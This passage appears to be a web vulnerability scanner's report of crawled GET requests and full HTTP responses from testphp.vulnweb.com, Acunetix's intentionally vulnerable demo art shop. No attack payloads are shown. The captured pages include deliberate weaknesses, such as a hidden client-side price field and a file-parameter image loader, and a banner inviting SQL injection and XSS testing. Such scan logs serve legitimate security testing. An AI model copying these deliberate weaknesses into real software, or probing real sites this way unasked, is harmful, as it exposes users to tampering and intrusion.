Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=4 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=4 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:09 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6453 |
Response Body - size: 6,453 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Walking</h2><div class='story'><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $1000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='1000'><input type='hidden' name='addcart' value='4'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=5 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=5 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6382 |
Response Body - size: 6,382 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Mean</h2><div class='story'><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $460</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='460'><input type='hidden' name='addcart' value='5'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=6 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=6 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=2 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6454 |
Response Body - size: 6,454 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Thing</h2><div class='story'><p><a href='showimage.php?file=./pictures/6.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/6.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><h3>Long description</h3><p><p> This picture is an 99 cm x 200 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $10000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='10000'><input type='hidden' name='addcart' value='6'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=7 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=7 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:11 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5734 |
Response Body - size: 5,734 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Trees</h2><div class='story'><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>bla bla bla</p><h3>Long description</h3><p>bla bla bla long</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p>the price of this item is: $15000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='15000'><input type='hidden' name='addcart' value='7'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/robots.txt |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 224 bytes. |
GET http://testphp.vulnweb.com/robots.txt HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 155 bytes. |
HTTP/1.1 404 Not Found
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:43 GMT Content-Type: text/html Content-Length: 153 Connection: keep-alive |
Response Body - size: 153 bytes. |
<html>
<head><title>404 Not Found</title></head> <body> <center><h1>404 Not Found</h1></center> <hr><center>nginx/1.19.0</center> </body> </html> |
URL | http://testphp.vulnweb.com/signup.php |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 271 bytes. |
GET http://testphp.vulnweb.com/signup.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/login.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6033 |
Response Body - size: 6,033 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>signup</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <h2 id="pageName">Signup new user</h2> <h4>Please do not enter real information here.</h4> <h4>If you press the submit button you will be transferred to asecured connection.</h4> <form name="form1" method="post" action="/secured/newuser.php"> <table border="0" cellspacing="1" cellpadding="4"> <tr><td valign="top">Username:</td><td><input type="text" name="uuname" style="width:200px"></td></tr> <tr><td valign="top">Password:</td><td><input type="password" name="upass" style="width:200px"></td></tr> <tr><td valign="top">Retype password:</td><td><input type="password" name="upass2" style="width:200px"></td></tr> <tr><td valign="top">Name:</td><td><input type="text" name="urname" style="width:200px"></td></tr> <tr><td valign="top">Credit card number:</td><td><input type="text" name="ucc" style="width:200px"></td></tr> <tr><td valign="top">E-Mail:</td><td><input type="text" name="uemail" style="width:200px"></td></tr> <tr><td valign="top">Phone number:</td><td><input type="text" name="uphone" style="width:200px"></td></tr> <tr><td valign="top">Address:</td><td><textarea wrap="soft" name="uaddress" rows="5" style="width:200px"></textarea></td></tr> <tr><td colspan="2" align="right"><input type="submit" value="signup" name="signup"></td></tr> </table> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high 